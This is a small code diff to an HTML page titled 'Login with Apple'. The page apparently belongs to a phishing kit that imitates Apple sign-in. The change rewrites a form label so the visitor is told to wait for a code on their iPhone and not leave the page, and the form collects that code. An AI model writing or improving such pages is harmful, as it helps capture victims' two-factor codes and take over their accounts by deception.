--- a/apple2.html
+++ b/apple2.html
@@ -18,7 +18,7 @@
     </div>
     <form action="./index.html" method="get" name="form">
         <h3>Login with Apple</h3>
-        <label for="username">Check your Iphone</label>
+        <label for="username">Check your Iphone<br/>within one minute, a window with a code will appear on your iPhone, do not exit the page</label>
         <input type="text" placeholder="Code" name="username" id="username" class="login" required>
 
         <button type="submit">Log in</button>
